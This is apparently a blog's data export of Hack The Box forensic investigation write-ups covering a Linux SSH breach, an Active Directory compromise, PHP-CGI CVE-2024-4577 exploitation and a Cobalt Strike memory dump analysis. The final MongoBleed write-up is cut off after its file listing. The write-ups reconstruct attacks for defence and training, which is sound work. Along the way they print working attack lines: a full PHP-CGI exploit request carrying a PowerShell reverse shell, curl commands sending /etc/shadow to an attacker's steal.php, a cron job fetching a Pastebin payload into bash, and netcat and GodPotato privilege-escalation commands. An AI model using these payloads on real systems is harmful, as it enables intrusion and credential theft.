At 2025-02-10 19:39:03 the attacker successfully logged in for the first time as administrator. auth.log:\n1LuckyShot sshd[13105]: Accepted password for administrator from 192.168.161.198 port 46160 ssh2 2LuckyShot sshd[13105]: pam_unix(sshd:session): session opened for user administrator(uid=1000) by administrator(uid=0) The attacker performed system enumeration, identifying user accounts, groups, and running processes. After verifying sudo privileges, he cloned the LaZagne tool and the mimipenguin.sh script for credential dumping. Then he transferred sensitive files (Passwords_Backup.txt, Server_Credentials.txt) to a remote machine:\n1$ scp Passwords_Backup.txt Server_Credentials.txt kali@192.168.161.198:~/Desktop/ persistence # new service # At 2025-02-10 20:11:19 the attacker executed a malicious script sys_monitor.sh: 3ae5dea716a4f7bfb18046bfba0553ea01021c75 /home/administrator/tmp/sys_monitor.sh\nThis script adds a new service for persistence: systemd-networkm.service\n1[Unit] 2Description=System Network Management 3After=network.target 4 5[Service] 6ExecStart=/bin/bash /tmp/sys_monitor.sh 7Restart=always 8User=root 9 10[Install] 11WantedBy=multi-user.target startup files # In root\u0026rsquo;s startup files, .bashrc contains ncat -lvp 7575 \u0026amp; and .profile contains ncat -lvp 9000 \u0026amp;\nAnalyzing /root/.ssh/authorized_keys, I identified the attacker\u0026rsquo;s public key. The key comment kali@kali reveals the origin username and hostname.\n1ssh-rsa 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 kali@kali new user # At 2025-02-10 20:11:21 
the attacker added a new user Regev for persistence. auth.log:\n1LuckyShot sudo: root : TTY=pts/2 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/useradd -m -s /bin/bash -G sudo,adm Regev 2LuckyShot useradd[16903]: new group: name=Regev, GID=1001 3LuckyShot useradd[16903]: new user: name=Regev, UID=1001, GID=1001, home=/home/Regev, shell=/bin/bash, from=/dev/pts/3 4LuckyShot useradd[16903]: add \u0026#39;Regev\u0026#39; to group \u0026#39;adm\u0026#39; 5LuckyShot useradd[16903]: add \u0026#39;Regev\u0026#39; to group \u0026#39;sudo\u0026#39; 6LuckyShot useradd[16903]: add \u0026#39;Regev\u0026#39; to shadow group \u0026#39;adm\u0026#39; 7LuckyShot useradd[16903]: add \u0026#39;Regev\u0026#39; to shadow group \u0026#39;sudo\u0026#39; data exfiltration # malicious cron # In /etc/cron.d/systemcheck I found a malicious cron job configured to execute every minute with root privileges. The command downloads a payload from Pastebin and executes it. auth.log:\n12025-02-10T20:11:20.744693+02:00 LuckyShot sudo: root : TTY=pts/2 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/tee /etc/cron.d/syscheck 1/1 * * * root command -v curl \u0026gt;/dev/null 2\u0026gt;\u0026amp;1 || (apt update \u0026amp;\u0026amp; apt install -y curl) \u0026amp;\u0026amp; curl -fsSL https://pastebin.com/raw/SAuEez0S | rev | base64 -d | bash Analysing that file \u0026hellip;\n1$ echo \u0026#34;=AHaw5CbhVGdz9CO5EjLxYTMugjNx4iM5EzLvoDc0RHag0CQgQWLgQ1UPBFIY1CIsJXdjBCfgQ2dzNXYw9yY0V2LgQjNlNXYipQDwhGcuwWYlR3cvgTOx4SM2EjL4YTMuITOx8yL6AHd0hGItAEIk1CIUN1TQBCWtACbyV3YgwHI39GZhh2cvMGdl9CI0YTZzFmY\u0026#34; | rev |base64 -d 2base64 /etc/shadow | curl -X POST -d @- http://192.168.161.198/steal.php 3base64 /etc/passwd | curl -X POST -d @- http://192.168.161.198/steal.php Attack Timeline # 12025-02-10 19:38:18 - Attempted SSH brute-force attack initiated from 192.168.161.198 targeting root account 22025-02-10 19:39:03 - Successful Authentication as `administrator` user via SSH 32025-02-10 19:39-20:11 - System enumeration performed 
42025-02-10 ~20:00 - Passwords_Backup.txt, Server_Credentials.txt exfiltrated via SCP to 192.168.161.198 52025-02-10 20:11:19 - Persistence with systemd service `systemd-networkm.service` created to execute sys_monitor.sh 62025-02-10 20:11:20 - Persistence with cron job installed in `/etc/cron.d/syscheck` for automated payload execution 72025-02-10 20:11:21 - Persistence with new privileged user `Regev` created with sudo and adm group membership 82025-02-10 20:11:xx - Persistence with attacker\u0026#39;s SSH public key added to `/root/.ssh/authorized_keys` 92025-02-10 20:11:xx - Persistence with netcat listeners configured in `/root/.bashrc` (port 7575) and `/root/.profile` (port 9000) 10Ongoing - Automated exfiltration of /etc/shadow and /etc/passwd via malicious cron job IOCs # Network\n- attacker IP Address: 192.168.161.198\n- pastebin.com/raw/SAuEez0S\n- http://192.168.161.198/steal.php\n- backdoor listening ports: 7575/tcp, 9000/tcp (ncat)\nFiles\n- /home/administrator/tmp/sys_monitor.sh\n- /etc/systemd/system/systemd-networkm.service\n- /etc/cron.d/syscheck\n- /tmp/sys_monitor.sh\nModified System Files\n- /root/.bashrc - Contains ncat -lvp 7575 \u0026amp;\n- /root/.profile - Contains ncat -lvp 9000 \u0026amp;\n- /root/.ssh/authorized_keys - Unauthorized SSH key added\nUser - Backdoor User: Regev (UID: 1001, GID: 1001)\nRecommendations # Immediate Actions\nIsolate compromised system from network Block attacker IP 192.168.161.198 on firewall Remove backdoor user Regev Disable malicious service /etc/systemd/system/systemd-networkm.service Remove malicious cron: /etc/cron.d/syscheck Remove ncat -lvp entries from /root/.bashrc and /root/.profile Remove unauthorized SSH key from /root/.ssh/authorized_keys Kill netcat listeners: pkill -f \u0026quot;ncat -lvp\u0026quot; Credential\nReset passwords for administrator and root accounts Rotate all credentials from exfiltrated files (Passwords_Backup.txt, Server_Credentials.txt) System\nSSH - disable root login, implement 
key-based auth only, brute-force protection Configure auditd for monitoring /etc/passwd, /etc/shadow, systemd services, cron jobs, SSH keys ","date":"February 2, 2026","externalUrl":null,"permalink":"/investigations/htb-luckyshot/","section":"","summary":"","title":"HTB-LuckyShot","type":"investigations"},{"content":"","date":"February 2, 2026","externalUrl":null,"permalink":"/tags/t1053.003/","section":"Tags","summary":"","title":"T1053.003","type":"tags"},{"content":"","date":"February 2, 2026","externalUrl":null,"permalink":"/tags/t1098.004/","section":"Tags","summary":"","title":"T1098.004","type":"tags"},{"content":"","date":"February 2, 2026","externalUrl":null,"permalink":"/tags/t1110/","section":"Tags","summary":"","title":"T1110","type":"tags"},{"content":"","date":"February 2, 2026","externalUrl":null,"permalink":"/tags/t1136.001/","section":"Tags","summary":"","title":"T1136.001","type":"tags"},{"content":"","date":"February 2, 2026","externalUrl":null,"permalink":"/tags/t1543.002/","section":"Tags","summary":"","title":"T1543.002","type":"tags"},{"content":"","date":"January 31, 2026","externalUrl":null,"permalink":"/tags/cve-2024-4577/","section":"Tags","summary":"","title":"CVE-2024-4577","type":"tags"},{"content":" Difficulty: Easy OS: Windows Date: 2026-01-31 Description:\nInvestigation of an Active Directory breach in Main.local domain involving DC01 and two clients (Client02, Client03). 
User on Client02 received a phishing email that led to full domain compromise.\nTL;DR # Analyzed Windows Event Logs revealing a complete AD compromise chain: phishing email with macro-enabled document → credential dumping with Mimikatz → lateral movement via PsExec → DCSync attack → domain admin compromise → persistence via scheduled task, service, and registry run key.\nAttack Timeline # 12025-05-25 03:27:56 UTC - Initial compromise (Client02) 22025-05-25 03:32:02 UTC - Dropper download 32025-05-25 04:28:17 UTC - Reverse shell established 42025-05-25 03:37:00 UTC - PowerView downloaded 52025-05-25 03:42:33 UTC - Kerberoasting (sqlsvc) 62025-05-25 04:03:47 UTC - Lateral movement to Client03 72025-05-25 04:10:43 UTC - Mimikatz execution 82025-05-25 04:12:21 UTC - Credential abuse (lucas) 92025-05-25 04:26:36 UTC - DCSync attack 102025-05-25 04:34:01 UTC - Domain Admin access 112025-05-25 04:38:53 UTC - Persistence established Initial Access # T1566.001\nAt 2025-05-25 03:27:56 UTC, user MAIN\\jody opened a malicious macro-enabled document:\n1Process: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE 2File: C:\\Users\\jody\\Downloads\\Profits.docm 3Parent: C:\\Windows\\explorer.exe (PID 2092) 4PID: 1160 5 6SHA256: 1C254F5E03462A7C232265E913162DF2AAE6B5EA5056284512BB32343C0A9507 Execution # The macro spawned a command shell, which launched PowerShell (PID 4776):\n1Process: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe 2Parent: C:\\Windows\\System32\\cmd.exe (PID 8996) 3Working Directory: C:\\Users\\jody\\Documents\\ 4User: MAIN\\jody T1105\nAt 2025-05-25 03:32:02 UTC, the attacker downloaded a dropper:\n1Invoke-WebRequest -Uri \u0026#34;http://192.168.204.152/UpdatePolicy.exe\u0026#34; -OutFile \u0026#34;C:\\Users\\jody\\Downloads\\UpdatePolicy.exe\u0026#34; C2 Server: 192.168.204.152 T1071.001\nAt 2025-05-25 04:28:17 UTC, reverse shell established:\n1Process: C:\\Users\\jody\\Downloads\\UpdatePolicy.exe (PID 4352) 2Source: 
192.168.204.129:49956 3Destination: 192.168.204.152:1337 Discovery # T1087.002\nAt 2025-05-25 03:37:00 UTC, PowerView downloaded for AD enumeration:\n1ScriptBlock ID: 232ebf81-40d1-402f-8910-9ee157bc7dca 2Path: C:\\Users\\jody\\Downloads\\PowerView.ps1 Credential Access # T1558.003\nAt 2025-05-25 03:42:33 UTC, Kerberos TGS requested for service account:\n1Account: jody@MAIN.LOCAL 2Service: sqlsvc (S-1-5-21-620716483-2719109048-3577772375-2115) 3Ticket Encryption: 0x17 (RC4-HMAC) 4Ticket Options: 0x40810000 The attacker successfully cracked the service account credentials offline. T1003.001\nAt 2025-05-25 04:10:43 UTC, Mimikatz executed on Client02 (masqueraded as netdiag.exe):\n1Process: C:\\Users\\jody\\Downloads\\netdiag.exe 2Parent: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe (PID 6304) 3User: NT AUTHORITY\\SYSTEM 4Time: 2025-05-25 04:10:43 UTC Credentials obtained: MAIN\\lucas (cleartext password)\nLateral Movement # T1021.002\nAt 2025-05-25 04:03:47 UTC, lateral movement to Client03 via renamed PsExec:\n1Process: C:\\Windows\\VgYTbFEK.exe 2User: NT AUTHORITY\\SYSTEM 3Time: 2025-05-25 04:05:12 UTC Post-exploitation commands executed at 04:07:57 UTC:\n1whoami # Verify SYSTEM privileges 2net user # Enumerate local accounts (04:08:23 UTC) T1078.002\nAt 2025-05-25 04:12:21 UTC, attacker used stolen credentials:\n1runas /user:Main\\lucas cmd 1Account: sqlsvc 2Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 3Logon Time: 2025-05-25 04:03:47 UTC 4Error Code: 0x0 (Success) Privilege Escalation # T1003.006\nAt 2025-05-25 04:26:36 UTC, DCSync attack executed against DC01:\n1Subject: MAIN\\lucas (S-1-5-21-620716483-2719109048-3577772375-2114) 2Object Server: DS 3Access List: DS-Replication-Get-Changes-All 4Property GUID: {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} This GUID corresponds to the DS-Replication-Get-Changes-All extended right, allowing replication of KRBTGT hash and all domain credentials.\nDomain Admin Access: 2025-05-25 04:34:01 
UTC\nPersistence # T1053.005\nAt 2025-05-25 04:38:53 UTC:\n1Process: C:\\Windows\\System32\\schtasks.exe 2CommandLine: schtasks.exe /create /tn WindowsUpdateCheck /tr C:\\Windows\\System32\\scvhost.exe /sc onstart /ru SYSTEM /f 3User: MAIN\\Administrator 4Parent: C:\\Windows\\System32\\wsmprovhost.exe (WinRM) T1547.001\nAt 2025-05-25 04:40:09 UTC:\n1Process: C:\\Windows\\System32\\reg.exe 2CommandLine: reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v xcvafctr /t REG_SZ /d C:\\Windows\\System32\\scvhost.exe /f 3User: MAIN\\Administrator 4Parent: C:\\Windows\\System32\\wsmprovhost.exe (WinRM) T1543.003\nAt 2025-05-25 04:43:01 UTC:\n1Process: C:\\Windows\\System32\\sc.exe 2CommandLine: sc.exe create WindowsUpdateSvc binPath= C:\\Windows\\System32\\scvhost.exe start= auto 3User: MAIN\\Administrator 4Parent: C:\\Windows\\System32\\wsmprovhost.exe (WinRM) Persistence Payload: C:\\Windows\\System32\\scvhost.exe (typosquatting svchost.exe)\nIndicators of Compromise # Files:\nC:\\Users\\jody\\Downloads\\Profits.docm (SHA256: 1C254F5E03462A7C232265E913162DF2AAE6B5EA5056284512BB32343C0A9507) C:\\Users\\jody\\Downloads\\UpdatePolicy.exe C:\\Users\\jody\\Downloads\\PowerView.ps1 C:\\Users\\jody\\Downloads\\netdiag.exe (Mimikatz) C:\\Windows\\VgYTbFEK.exe (PsExec) C:\\Windows\\System32\\scvhost.exe (Persistence backdoor) Network:\nC2 Server: 192.168.204.152:1337 Victim: 192.168.204.129 Compromised Accounts:\nMAIN\\jody (initial victim) MAIN\\sqlsvc (service account - Kerberoasted) MAIN\\lucas (domain user) MAIN\\Administrator (domain admin) Scheduled Task: WindowsUpdateCheck\nService: WindowsUpdateSvc\nRegistry Run Key: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\xcvafctr\n","date":"January 31, 2026","externalUrl":null,"permalink":"/investigations/htb-ghosttrace/","section":"","summary":"Analyzed Windows Event Logs revealing a complete AD compromise chain: phishing email with macro-enabled document → credential dumping with Mimikatz → lateral 
movement via PsExec → DCSync attack → domain admin compromise → persistence via scheduled task, service, and registry run key.","title":"HTB-GhostTrace","type":"investigations"},{"content":" Difficulty: Easy OS: Windows Date: 2026-01-31 Description: You are a junior security analyst at a small Japanese cryptocurrency trading company. After detecting suspicious activity on the internal network, you exported a PCAP for further investigation. Analyze this capture to determine whether the environment was compromised and reconstruct the attacker’s actions.\nTL;DR # Analyzed network traffic showing exploitation of CVE-2024-4577 (PHP-CGI argument injection) against a Windows server running PHP 8.1.25. Attacker achieved RCE, established reverse shell on port 4545, then escalated privileges using GodPotato to spawn a SYSTEM-level shell on port 5555.\nAttacker Reconnaissance # Target Information:\n- PHP Version: PHP/8.1.25\n- Victim IP: 192.168.170.130\n- Attacker IP: 192.168.170.128\nOpen ports discovered:\n- 22/tcp - SSH\n- 80/tcp - HTTP\n- 135/tcp - RPC\n- 139/tcp - NetBIOS\n- 443/tcp - HTTPS\n- 445/tcp - SMB\n- 3389/tcp - RDP\n- 5357/tcp - WSDAPI\nInitial Exploitation # I filtered HTTP traffic and observed the attacker (192.168.170.128) testing PHP command execution with \u0026lt;?php system('****');?\u0026gt; payloads. 
At 2025-01-22 09:47:32, the attacker exploited a CVE-2024-4577 to gain a Reverse Shell to 192.168.170.128 on 4545/tcp\n1POST /?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 2Host: 192.168.170.130 3User-Agent: curl/8.11.1 4Accept: */* 5Content-Length: 569 6Content-Type: application/x-www-form-urlencoded 7 8\u0026lt;?php system(\u0026#39;powershell -NoP -NonI -W Hidden -Exec Bypass -Command \u0026#34;$client = New-Object System.Net.Sockets.TCPClient(\\\u0026#39;192.168.170.128\\\u0026#39;,4545);$stream = $client.GetStream();[byte[]] $buffer = 0..65535|%{0};while(($i = $stream.Read($buffer, 0, $buffer.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0,$i);$sendback = (iex $data 2\u0026gt;\u0026amp;1 | Out-String );$sendback2 = $sendback + \\\u0026#39;PS \\\u0026#39;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\u0026#34;\u0026#39;); ?\u0026gt; CVE-2024-4577 # In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows with certain code pages, Windows \u0026ldquo;Best-Fit\u0026rdquo; behavior replaces characters in command line arguments.\nin this specific exploit:\n1%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input The soft hyphen (%AD) is converted to a standard hyphen (-) by Windows, resulting in:\n-d allow_url_include=1 - enables remote file inclusion -d auto_prepend_file=php://input - executes code from POST body Privilege Escalation # Following the reverse shell connection on port 4545, the attacker downloaded tools and escalated privileges:\n1PS \u0026gt; wget http://192.168.170.128:9696/nc64.exe -o time.exe 2PS \u0026gt; iwr -uri \u0026#34;https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe\u0026#34; -Outfile TimeProvider.exe 3PS \u0026gt; ./TimeProvider.exe -cmd \u0026#34;time.exe 192.168.170.128 5555 -e 
cmd\u0026#34; Downloaded nc64.exe as time.exe Downloaded GodPotato-NET4.exe as TimeProvider.exe Used GodPotato to execute Netcat with SYSTEM privileges Established privileged reverse shell on 192.168.170.128:5555 ","date":"January 31, 2026","externalUrl":null,"permalink":"/investigations/htb-packet-_puzzle/","section":"","summary":"Analyzed network traffic showing exploitation of CVE-2024-4577 (PHP-CGI argument injection) against a Windows server running PHP 8.1.25. Attacker achieved RCE, established reverse shell on port 4545, then escalated privileges using GodPotato to spawn a SYSTEM-level shell on port 5555.","title":"HTB-Packet_Puzzle","type":"investigations"},{"content":"","date":"January 31, 2026","externalUrl":null,"permalink":"/tags/t1190/","section":"Tags","summary":"","title":"T1190","type":"tags"},{"content":"","date":"January 30, 2026","externalUrl":null,"permalink":"/tags/cobalt/","section":"Tags","summary":"","title":"Cobalt","type":"tags"},{"content":"","date":"January 30, 2026","externalUrl":null,"permalink":"/tags/cve-2024-14847/","section":"Tags","summary":"","title":"CVE-2024-14847","type":"tags"},{"content":" Difficulty: Easy OS: Windows Date: 2026-01-30 Description:\nA suspicious executable was identified running on one of the compromised endpoints. Initial triage suggests that this process may have been leveraged by the threat actor to establish a foothold on the system. To support further malware analysis and behavioral reconstruction, a user‑mode process dump of the suspected executable has been provided.\nTL;DR # Analyzed two process dumps (notepad.exe and update.exe) revealing a Cobalt Strike Beacon infection. 
The malware used process injection with reflective DLL loading, communicated with a C2 server at 101.10.25.4:8023, and carried capabilities for privilege escalation, token manipulation, and lateral movement via named pipes.\nInitial Analysis # I received two minidump files:\nnotepad.DMP: Mini DuMP crash report, 15 streams, Wed Nov 5 01:14:37 2025, 0x21826 type\nupdate.DMP: Mini DuMP crash report, 15 streams, Wed Nov 5 01:11:52 2025, 0x21826 type\nInjected Process (notepad.dmp) # I ran !analyze -v to get the OS information:\nOS_VERSION: 10.0.10240.16384\nOSPLATFORM_TYPE: x64\nOSNAME: Windows 10\nI listed the RWX memory regions with !address -f:PAGE_EXECUTE_READWRITE. Private RWX regions have no business in a legitimate notepad.exe. The region at b1`221a0000 starts with MZ, i.e. an EXE/DLL image mapped in memory, and the single page at b1`20870000 starts with the bytes fc 48 83 e4 f0 e8 ... 41 51 41 50 52 51 (shown as .H........AQAPRQ), the cld / and rsp / call / push r9 / push r8 / push rdx / push rcx opening of a position-independent shellcode stub:\n BaseAddress EndAddress+1 RegionSize Type State Protect Usage\n--------------------------------------------------------------------------------------------------------------------------\n b1`20870000 b1`20871000 0`00001000 MEM_PRIVATE MEM_COMMIT PAGE_EXECUTE_READWRITE \u0026lt;unknown\u0026gt; [.H........AQAPRQ]\n b1`221a0000 b1`221ee000 0`0004e000 MEM_PRIVATE MEM_COMMIT PAGE_EXECUTE_READWRITE \u0026lt;unknown\u0026gt; [MZARUH..H......H]\n b1`23bd0000 b1`23fd0000 0`00400000 MEM_PRIVATE MEM_COMMIT PAGE_EXECUTE_READWRITE \u0026lt;unknown\u0026gt; [.H....3..E.H....]\nI examined the threads. 
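Before going through the threads, an added example that is not part of the original analysis: the sanity check I would run on a region like b1`221a0000 before carving it. It parses the PE header in place to confirm the MZ really is an image, reads SizeOfImage to size the .writemem, and flags the MZARUH signature, which is MZ followed directly by code (pop r10; push r10; push rbp; mov rbp,rsp), the prologue Cobalt Strike's reflective loader leaves in the patched DOS header. The region bytes, the decoy MZ and the base address used in the usage line are all constructed for the example; on the real dump the bytes would come from .readmem or db.

```python
import struct

# "MZ" followed by the first instructions of Cobalt Strike's reflective loader
# (pop r10; push r10; push rbp; mov rbp,rsp): the bytes WinDbg rendered as MZARUH..
REFLECTIVE_STUB = b"MZARUH\x89\xe5"
IMAGE_FILE_MACHINE_AMD64 = 0x8664


def build_sample_region() -> bytes:
    """Constructed stand-in for an RWX region (not bytes from the dump): 16 bytes of
    padding, a PE32+ header carrying the reflective stub and SizeOfImage 0x4e000,
    some zero padding, and a decoy 'MZ' with no PE header behind it."""
    dos = bytearray(0x40)
    dos[:8] = REFLECTIVE_STUB
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew: PE header right after the DOS header
    coff = struct.pack(
        "<IHHIIIHH",
        0x00004550,                 # "PE\0\0"
        IMAGE_FILE_MACHINE_AMD64,   # Machine
        4,                          # NumberOfSections
        0, 0, 0,                    # TimeDateStamp, PointerToSymbolTable, NumberOfSymbols
        0xF0,                       # SizeOfOptionalHeader (PE32+)
        0x2022,                     # Characteristics: EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE | DLL
    )
    opt = bytearray(0xF0)
    struct.pack_into("<H", opt, 0, 0x20B)            # Magic: PE32+
    struct.pack_into("<I", opt, 56, 0x4E000)         # SizeOfImage (offset 56 in PE32 and PE32+)
    decoy = b"MZ" + b"\x00" * 0x50                   # e_lfanew reads as 0, so it must be rejected
    return b"\x90" * 0x10 + bytes(dos) + coff + bytes(opt) + b"\x00" * 0x100 + decoy


def parse_pe_at(region: bytes, off: int):
    """Header facts if a structurally valid PE header starts at `off`, else None."""
    if off + 0x40 > len(region):
        return None
    e_lfanew = struct.unpack_from("<I", region, off + 0x3C)[0]
    pe = off + e_lfanew
    # The DOS header is 0x40 bytes; we need the 24-byte signature+COFF header plus
    # the optional header up to and including SizeOfImage.
    if e_lfanew < 0x40 or pe + 24 + 60 > len(region):
        return None
    if region[pe:pe + 4] != b"PE\0\0":
        return None
    machine, nsections = struct.unpack_from("<HH", region, pe + 4)
    magic = struct.unpack_from("<H", region, pe + 24)[0]
    size_of_image = struct.unpack_from("<I", region, pe + 24 + 56)[0]
    return {
        "offset": off,
        "machine": machine,
        "sections": nsections,
        "pe32plus": magic == 0x20B,
        "size_of_image": size_of_image,
        "reflective_stub": region[off:off + 8] == REFLECTIVE_STUB,
    }


def carve_pe(region: bytes) -> list:
    """Every offset in `region` that carries a valid PE header; stray 'MZ' bytes are skipped."""
    hits, pos = [], region.find(b"MZ")
    while pos != -1:
        info = parse_pe_at(region, pos)
        if info:
            hits.append(info)
        pos = region.find(b"MZ", pos + 1)
    return hits


def writemem_command(region_base: int, info: dict, path: str) -> str:
    """WinDbg .writemem line for the image: start at the MZ, length SizeOfImage rounded up to pages."""
    length = (info["size_of_image"] + 0xFFF) & ~0xFFF
    return f".writemem {path} {region_base + info['offset']:x} L?{length:x}"


if __name__ == "__main__":
    region = build_sample_region()
    for hit in carve_pe(region):
        print(hit)
        # constructed base chosen so the image lands at the address seen in the dump
        print(writemem_command(0xB12219FFF0, hit, r"c:\Users\f\Desktop\shellcode.bin"))
```

A carved region is an in-memory layout: sections sit at their virtual addresses, so tools that expect file alignment need the section raw pointers realigned (or must be told to treat the file as a memory image) before the import table resolves. Beacon's reflective loader leaves its own header in place, which is why MZARUH is findable at all; a loader that wipes the header after mapping leaves only the region size to go on.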
Thread 0x3a8 has its start address at 000000b1`20870000, the start of the first RWX region, so it is the injected thread; the other three start in notepad or ntdll:\n0xc28 0x0 notepad!WinMainCRTStartup (00007ff7`8dc23fe0)\n0x3a8 0x1 000000b1`20870000\n0x5fc 0x2 ntdll!TppWorkerThread (00007fff`47309040)\n0x2d0 0x3 ntdll!TppWorkerThread (00007fff`47309040)\nThread Analysis # The code at that address is a shellcode stager that resolves its imports and then unpacks and runs the MZ payload found at b1`221a0000. Its prologue is the standard position-independent API-hashing stub: gs:[60h] is the PEB, +18h its Ldr pointer and +20h the InMemoryOrderModuleList, whose entries are walked to hash each module\u0026rsquo;s BaseDllName (buffer at +50h, length at +4Ah) after uppercasing it in the lods / cmp al,61h loop:\n0:001\u0026gt; u b120870000 L50\n000000b1`20870000 fc cld\n000000b1`20870001 4883e4f0 and rsp,0FFFFFFFFFFFFFFF0h\n000000b1`20870005 e8c8000000 call 000000b1`208700d2\n000000b1`2087000a 4151 push r9\n000000b1`2087000c 4150 push r8\n000000b1`2087000e 52 push rdx\n000000b1`2087000f 51 push rcx\n000000b1`20870010 56 push rsi\n000000b1`20870011 4831d2 xor rdx,rdx\n000000b1`20870014 65488b5260 mov rdx,qword ptr gs:[rdx+60h]\n000000b1`20870019 488b5218 mov rdx,qword ptr [rdx+18h]\n000000b1`2087001d 488b5220 mov rdx,qword ptr [rdx+20h]\n000000b1`20870021 488b7250 mov rsi,qword ptr [rdx+50h]\n000000b1`20870025 480fb74a4a movzx rcx,word ptr [rdx+4Ah]\n000000b1`2087002a 4d31c9 xor r9,r9\n000000b1`2087002d 4831c0 xor rax,rax\n000000b1`20870030 ac lods byte ptr [rsi]\n000000b1`20870031 3c61 cmp al,61h\n000000b1`20870033 7c02 jl 000000b1`20870037\nPayload Extraction # I extracted the injected image from b1221a0000, using the region size (0x4e000) as the length:\n.writemem c:\\Users\\f\\Desktop\\shellcode.bin b1221a0000 L?4e000\nMalicious Process (update.dmp) # An image with the same MZARUH header and the same 0x4e000 size is mapped in this process too, at 0`003a0000; I extracted it as shellcode1.bin:\n0:000\u0026gt; !address -f:PAGE_EXECUTE_READWRITE\n\n BaseAddress EndAddress+1 RegionSize Type State Protect Usage\n--------------------------------------------------------------------------------------------------------------------------\n 0`003a0000 0`003ee000 0`0004e000 MEM_PRIVATE MEM_COMMIT PAGE_EXECUTE_READWRITE \u0026lt;unknown\u0026gt; [MZARUH..H......H]\nC2 Server IP # I searched the whole address space for http:// strings:\n0:000\u0026gt; s -a 0 L?0x7fffffffffffffff \u0026#34;http://\u0026#34;\n00000000`0060b8b0 68 74 74 70 3a 2f 2f 31-30 31 2e 31 30 2e 32 35 http://101.10.25\nI dumped the full URL at 0060b8b0:\n0:000\u0026gt; db 0060b8b0 L100\n00000000`0060b8b0 68 74 74 70 3a 2f 2f 31-30 31 2e 31 30 2e 32 35 http://101.10.25\n00000000`0060b8c0 2e 34 3a 38 30 32 33 2f-6a 2e 61 64 00 00 00 00 .4:8023/j.ad....\nC2 Server: http://101.10.25.4:8023/j.ad\nShellcode Analysis # I identified the payload as a Cobalt Strike Beacon from its strings.\nFramework Identification #\nascii,10,0x0002C8F0,-,beacon.dll\nascii,14,0x0003B892,-,beacon.x64.dll\nascii,16,0x0003B8A1,-,ReflectiveLoader\nC2 Communication #\nascii,69,0x0002D3D9,-,IEX (New-Object Net.Webclient).DownloadString(\u0026#39;http://127.0.0.1:%u/\u0026#39;)\nascii,49,0x0002D491,-,powershell -nop -exec bypass -EncodedCommand \u0026#34;%s\u0026#34;\nThese two are Beacon\u0026rsquo;s format strings for its powershell / powerpick commands, which serve an imported script from a loopback web server on a port filled in at run time; the actual C2 channel is the HTTP URL found above. Capabilities # - Process Injection:\nCreateRemoteThread, WriteProcessMemory, ReadProcessMemory, VirtualAllocEx, VirtualProtectEx, SetThreadContext, GetThreadContext\n- Named Pipe Communication: ConnectNamedPipe, CreateNamedPipe, DisconnectNamedPipe, PeekNamedPipe, ImpersonateNamedPipeClient\n- Privilege Escalation: SeDebugPrivilege, SeTcbPrivilege, SeCreateTokenPrivilege, SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege\n- Token Manipulation: ImpersonateLoggedOnUser, CreateProcessAsUser, CreateProcessWithToken, DuplicateTokenEx, AdjustTokenPrivileges\n","date":"January 30, 2026","externalUrl":null,"permalink":"/investigations/htb-crashdump/","section":"","summary":"Analyzed two process dumps (notepad.exe and update.exe) revealing a Cobalt Strike Beacon infection. The malware used process injection with reflective DLL loading, communicated with C2 server at 101.10.25.4:8023, and possessed capabilities for privilege escalation, token manipulation, and lateral movement via named pipes.","title":"HTB-CrashDump","type":"investigations"},{"content":" Difficulty: Super Easy OS: Linux Date: 2026-01-30 Description:\nYou were contacted early this morning to handle a high‑priority incident involving a suspected compromised server. The host, mongodbsync, is a secondary MongoDB server. According to the administrator, it\u0026rsquo;s maintained once a month, and they recently became aware of a vulnerability referred to as MongoBleed. As a precaution, the administrator has provided you with root-level access to facilitate your investigation.\nYou have already collected a triage acquisition from the server using UAC. Perform a rapid triage analysis of the collected artifacts to determine whether the system has been compromised, identify any attacker activity (initial access, persistence, privilege escalation, lateral movement, or data access/exfiltration), and summarize your findings with an initial incident assessment and recommended next steps.\ninitial analysis # What we\u0026rsquo;ve got (a UAC triage collection):\n.\n├── bodyfile\n│   └── bodyfile.txt\n├── hash_executables\n│   ├── hash_executables.md5\n│   └── hash_executables.sha1\n├── live_response\n│   ├── containers\n│   ├── hardware\n│   ├── network\n│   ├── packages\n│   ├── process\n│   ├── storage\n│   └── system\n├── [root]\n│   ├── etc\n│   ├── home\n│   ├── lib\n│   ├── root\n│   ├── run\n│   ├── snap\n│   ├── usr\n│   └── var\n└── system\n    ├── getcap.txt\n    ├── group_name_unknown_files.txt\n    ├── hidden_directories.txt\n    ├── hidden_files.txt\n    ├── sgid.txt\n    ├── suid.txt\n    ├── user_name_unknown_files.txt\n    ├── world_writable_directories.txt\n    └── world_writable_files.txt\nCVE explained # 1. 
